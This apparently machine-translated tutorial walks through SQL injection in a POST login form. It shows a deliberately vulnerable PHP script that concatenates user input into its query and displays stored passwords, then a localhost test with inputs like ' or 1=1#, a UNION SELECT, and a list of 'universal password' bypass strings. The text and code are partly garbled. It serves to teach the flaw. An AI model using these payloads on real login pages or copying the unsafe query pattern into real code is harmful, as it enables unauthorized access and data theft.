1. Code article
Name:<input type= "text" name= "user" ><br>Password:<input type= "text" name= "pass" ><br><input type= "Submit" name= "submit" value= "Submit" ></center> PHP/*************************author:blooderosql_injection_post*************************/include(".. /conn.php ");error_reporting(0);if(isset($_post[' Submit '])){ if(!Empty($_post[' User ']) &&!Empty($_post[' Pass '])){ $user=$_post[' User ']; $pass=$_post[' Pass ']; Echo"You are currently entering the user name:".$user." <br> "; Echo"You are currently entering the password:".$pass." <br> "; $sql= "SELECT * from user where username= '$user' and password= '$pass‘"; $res=mysql_query($sql); $row=Mysql_fetch_array($res); if(Empty($row)){ Echo"<script>alert (' Landing failed ') </script>"; } Else{ Echo"Current User:<br>"; Echo"ID:".$row[' ID ']. " <br> "; Echo"Username:".$row[' username ']. " <br> "; Echo"Password:".$row[' Password ']. " <br> "; } } Else{ Echo"<script>alert (' username/password cannot be empty ') </script>"; }}Else{ Exit();}?>
2, injected into the article: http://localhost/pentest/sql/sql_injection_post.php
Correct input:
you currently enter the user name: admin you enter password: Pass Current User: ID:1username:adminpassword:pass
Try to inject:
You currently enter a user name: 1 ' you currently enter the password: 1
Login failed
You are currently entering a user name: 1 ' #你当前输入密码: 1
Login failed
You currently enter a user name: 1 ' or 1=1# your current password: 1 Current User: Id:1username:adminpassword:pass
Landing success
You are currently entering a username: 1 ' or 1=2# your current password: 1
Login failed
Here I explain the principle:
When we close the where statement and then the or 1=2, this time the constant false, so there will be no result;
When we pick up or 1=1, the constant is true, so we will query all;
You are currently entering user name: 1 ' and 1=2 Union SELECT * FROM user# you currently enter password: 1 Current User: Id:1username:adminpassword:pass
Here the principle does not understand can go to see the first hair sql_injection;
3, anti-injection
To post the data, the processing; there will be a detailed explanation
4, through the post injection, the introduction of the Universal password
"or" a "="a') or (' a ' = '1=1--'or ' 1=1--a' or ' 1=1--admin' or ' a ' = 'a password is random ' or 1 = 1/* user:something Pass: ' or ' 1 ' = ' one ' or ' 1 ' = ' 1admin ' or 1=1/*
Sql_injection Second Hair